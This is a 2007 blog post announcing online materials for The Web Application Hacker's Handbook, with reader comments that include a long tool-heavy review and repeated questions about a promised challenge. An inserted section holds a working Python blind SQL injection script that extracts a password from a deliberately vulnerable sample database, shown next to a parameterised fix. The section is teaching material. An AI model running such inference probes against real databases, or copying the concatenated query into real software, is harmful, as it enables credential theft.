Tuesday, November 6, 2007

Hacker's Handbook - online materials

A few people have emailed me asking where the online material promised in The Web Application Hacker's Handbook is. Apologies for the slight delay on that front. I have now posted almost everything to the location below, including answers to questions, source code, and the checklist of methodology tasks. The only thing not yet ready is the hacker's challenge, of which more in due course. The book's page on the Wiley web site will be updated shortly to point here:

dre said...

I hope that you realize how awesome your book is and what a world-class job you've done with it.

After receiving it two Fridays ago, I completed the book on Wednesday and have been taking notes and searching on particular topics, bookmarking them, and integrating them with the rest of my organized thoughts on web application security testing.

There are some sections of the book which simply blow my mind away. For example - Chapter 18, "Finding Vulnerabilities in Source Code" is pure genius. You should immediately start writing a book, document, etc - just on web application vulnerability code review.

I already see/hear people both online and offline begin to talk about SQL injection inference, OOB channels, and time delay attacks (btw - what do you think of the Sensepost squeeza tool?). Chapters 9 and 14 could also be expanded into a lot more work - but I remain completely fascinated by your choices for error messages, how well they are explained, and relating it all back to actual attacks. You leave me wanting more!

The book's website is great. Can you add packer to the list of links (maybe in the Tools section)? I'll also check out the Answers section - I didn't have any problems answering the questions after reading the chapters, but it will be a good learning tool for those who need it.

I was slightly disappointed to see very few references / bibliography / credit (and you mention at the beginning of the book that you didn't want to include this information - sort of strange IMO, but maybe I just come from a different perspective). The weakest chapter was Chapter 11 (Attacking Application Logic), but I also disliked Jeremiah Grossman's business logic paper until I saw his presentation. Logic flaws are kind of hard to explain - you almost have to be there to see it and even then it's sometimes hard to explain what is going on. Chapters 16 and 17 made me yawn more than the others for maybe somewhat obvious reasons, but the content was still fairly good - I would have added a few things.

When mapping out the application, I found it strange that Google hacking wasn't covered much at all, as one major example (although there is a new book coming out on this soon, so I could see why you stayed away from that topic).

The coverage of web services is very minimal - leaving out key attacks such as SOAP array abuse, XML entity expansion, external entity attacks, schema poisoning, web services PKI, XML encryption, XQuery injection, XDoS, malware in SOAP attachments, etc (but you did cover SOAP/XPath injection, JSON hijacking, and other topics I liked, and rather well at that!). No mention of WS security standards, xml-sig/xml-enc, schema validation, server-side encoding (in earlier chapters you cover server-side validation, but there should be output encodings for some - not SQL - server to services sinks), and other protections. However, there is a lack of explanation about WAFs (and XSGs) that I was happy to see missing.

Either your knowledge of tools, or your ability to include them in the book was a bit lacking (although I could see why since you probably wanted Burp Suite to be the focus of the book). For example - CookieWatcher? CookieSafe and CookieCuller are much more useful. Some topics were completely avoided, such as crawling/scraping Ajax, or even viewing XHR's with FireBug. You covered walking and modifying the DOM a bit when talking about DOM-based XSS (nice work here, too, btw - and the source code part on XSS is simply brilliant!). However, there are tools such as w3af, scanajax, and Sprajax that can automate much of what you said "had to be manually".

I know that pushing WebScarab and Paros as the only competitors to Burp Suite is a good idea in concept, but you probably should have covered Charles, Pantera, WebScarab-NG, Suru, and the Microsoft Press Hunting Security Bugs' Web Proxy Editor. There is also a lot to be said for passive analysis techniques such as those available in ProxMon, and possible with Pantera.

I know that ImmunityDebugger's SQL Hooker wasn't available when the book was written, but I would have liked to see these concepts covered as well - I mean - you did mention using FileMon or strace/ltrace (and Solaris truss) for helping with path traversal attacks. I've been aware of these concepts for a while and there are some tools that will do things outside of basic protocol analyzers (e.g. JDBC spy or any RDBMS spy, etc). Commercial tools such as beSTORM and Fortify Tracer are integrating server-side-proxy SQL injection helpers, so it will be interesting to see the evolution of these types of tools vs. the browser local proxies we rely on completely today.

Speaking of path traversal - you could have included some of the concepts alive in DFF Scanner, DirBuster, JBroFuzz (tons of these checks!), and again - passive analysis techniques using ProxMon.

You touched on CAPTCHAs in the authentication section all but barely, and really should have mentioned nearly-unbreakable CAPTCHAs like TEABAG_3D and at least the basic tools that can defeat most CAPTCHAs such as Caecus or gocr.

Most penetration testers (probably the majority target audience of the book) use only two types of tools: attack tools and attack analysis tools. It was really nice to see you list the Java, Flash, and ActiveX tools - as well as mentioning an editor such as Source Insight (hadn't seen that one before - most people I know use SourceEdit or SciTE instead). I know I'm almost being overly pedantic at this point, but I honestly miss some mention of AppCodeScan (code review tool), Pixy, Milk/Orizon, SWAAT, LAPSE, PHP-SAT, PhpSecAudit (all static code analysis tools) or Octotrike and the NASA SATC Automated Requirement Measurement Tool (attack-modeling and design review tools). I have always liked building tools in innovative ways such as the CSRF redirector, CSRF dorks, javascript-spider, and all the other infamous little programs over at GNUCITIZEN or 0x000000.com. I do hate to mention it, but PHP-IDS, dotnetids, and CORE GRASP might also be very useful for learning more about web application vulnerabilities because they are so close to the application. I could add many more examples, such as the .mario work, as well as HackVertor, Netcraft, myIPNeighbors, BugMeNot, TrashMail (or mailinator or dodgit, etc), and all the other cute little techniques that make web application hacking so fun.

I also know that you're preparing Burp Scanner, so I'm saddened most by the lack of inclusion of open-source scanners such as w3af (already mentioned, but worth mentioning a lot), Wapiti, Grabber, Wfuzz, SQLiX, sqlmap, sqlninja, and cruiser. Maybe this is your next book - 'How to Build a Web Application Security Scanner'?

Finally - the index makes me cry... if you do a second edition - please get somebody who can do this properly.

Of course, there's a lot to talk about and don't take this as harsh criticism that would suppress the message that you have incredible writing skills and amazing ability to bring something so beautiful and useful together like you did with 'The Web Application Hacker's Handbook'.

I'm going to read it from start to finish again starting tomorrow - this time doing the Q/A. Thanks so much for posting this material up!
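
The SQL injection inference attacks mentioned in the comment above, as an added example that is not part of the original post or of the book's own material. The database, table, column names and data are constructed for this example; the oracle is boolean (a row comes back or it does not) rather than time-based, but the per-character binary search is the same loop a time-delay oracle drives. The vulnerable lookup concatenates input into the query; the parameterised version is shown beside it to confirm the extraction loop gets nothing from it.

```python
import sqlite3


def build_db():
    """Constructed sample backend: an in-memory SQLite database with assumed
    table/column names and a secret the attacker wants to read."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cret!')")
    conn.execute("INSERT INTO users VALUES (2, 'alice', 'wonderland')")
    conn.commit()
    return conn


def vulnerable_lookup(conn, name):
    """Deliberately vulnerable: untrusted input concatenated into SQL.
    Returns only True/False (user exists), which is all the attacker needs."""
    sql = "SELECT id FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchone() is not None


def safe_lookup(conn, name):
    """Hardened form: the input is bound as a parameter, never parsed as SQL."""
    row = conn.execute("SELECT id FROM users WHERE name = ?", (name,)).fetchone()
    return row is not None


def extract_password(lookup, conn, target, max_len=32):
    """Recover target's password one character at a time through a yes/no oracle.

    Each probe closes the string literal, ORs in a condition on the secret, and
    comments out the rest of the original query.  A boolean oracle answers the
    condition directly; a time-based oracle would answer it through a delay."""
    recovered = ""
    for pos in range(1, max_len + 1):
        # Is there a character at this position at all?
        probe = (
            "x' OR (length((SELECT password FROM users WHERE name='"
            + target + "')) >= " + str(pos) + ") -- "
        )
        if not lookup(conn, probe):
            break
        # Binary search the code point of the character at this position.
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = (
                "x' OR (unicode(substr((SELECT password FROM users WHERE name='"
                + target + "'), " + str(pos) + ", 1)) > " + str(mid) + ") -- "
            )
            if lookup(conn, probe):
                lo = mid + 1   # character is above mid
            else:
                hi = mid       # character is mid or below
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", repr(extract_password(vulnerable_lookup, db, "admin")))
    print("parameterised:", repr(extract_password(safe_lookup, db, "admin")))
```

Each character costs about seven oracle queries (log2 of the 0..127 range) plus one length check, which is why inference attacks are practical even when every query must wait out a time delay. Against `safe_lookup` the probe is just a literal username that matches nothing, so the loop stops at the first length check.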

Anonymous said...

Any update on the challenge?!

PortSwigger said...

Mmm, the challenge. Er, no, nothing to update, sorry.

pjd said...

Is there still gonna be a hacker's challenge for readers of your book?
Or can I forget about it?
It would be a real pity as I am really enjoying your book and was looking forward to tackling the challenge.

Kind regards,

PortSwigger said...

Nothing to update since yesterday, sorry. There are lots of good quality web app hacking challenges around the web if you need something in the meantime.

Anonymous said...

Any update on the status of the hacking challenge webpage indicated in the book? Been waiting since the day the book came out... Still excited to play with it..

Anonymous said...

Any updates on the hacker challenge? Thanks.